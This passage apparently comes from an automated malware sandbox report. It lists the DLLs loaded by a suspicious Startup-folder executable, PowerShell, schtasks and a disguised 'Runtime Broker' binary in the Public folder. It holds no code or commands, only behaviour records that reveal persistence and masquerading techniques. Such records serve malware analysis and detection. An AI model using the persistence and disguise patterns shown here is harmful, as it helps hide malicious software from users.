                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: mscoree.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: apphelp.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: version.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: sspicli.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Runtime BrokerSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
